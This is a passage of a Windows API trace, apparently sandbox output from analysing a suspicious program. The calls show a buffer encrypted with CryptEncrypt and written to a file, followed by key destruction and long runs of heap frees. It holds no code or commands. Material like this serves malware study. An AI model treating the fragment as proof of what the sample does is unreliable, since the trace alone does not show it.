dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cafd0 [0120.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.139] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452ed90*, pdwDataLen=0x144e790*=0x8473, dwBufLen=0x8480 | out: pbData=0x452ed90*, pdwDataLen=0x144e790*=0x8480) returned 1 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.139] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.139] WriteFile (in: hFile=0x258, lpBuffer=0x451e498*, nNumberOfBytesToWrite=0x8480, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x451e498*, lpNumberOfBytesWritten=0x144f194*=0x8480, lpOverlapped=0x0) returned 1 [0120.141] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0120.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0120.142] CryptDestroyKey (hKey=0x41ac600) returned 1 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.143] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.143] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.143] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.143] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.144] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.144] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0120.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.145] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.145] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0120.146] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.146] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.147] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.147] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0120.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.148] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0120.148] 